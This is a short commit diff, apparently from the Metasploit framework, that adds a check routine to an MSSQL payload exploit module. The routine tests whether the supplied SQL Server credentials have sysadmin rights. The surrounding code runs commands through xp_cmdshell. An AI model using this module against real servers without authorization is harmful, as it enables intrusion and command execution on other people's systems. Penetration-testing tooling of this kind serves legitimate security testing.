Add a check() for mssql_payload
parent
5475cf50aa
commit
51764eb207
|
@ -68,6 +68,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
])
|
||||
end
|
||||
|
||||
def check
|
||||
if (not mssql_login_datastore)
|
||||
print_status("Invalid SQL Server credentials")
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
|
||||
mssql_query("select @@version", true)
|
||||
if mssql_is_sysadmin
|
||||
print_good "User #{datastore['USERNAME']} is a sysadmin"
|
||||
Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
# This is method required for the CmdStager to work...
|
||||
def execute_command(cmd, opts)
|
||||
mssql_xpcmdshell(cmd, datastore['VERBOSE'])
|
||||
|
|
Loading…
Reference in New Issue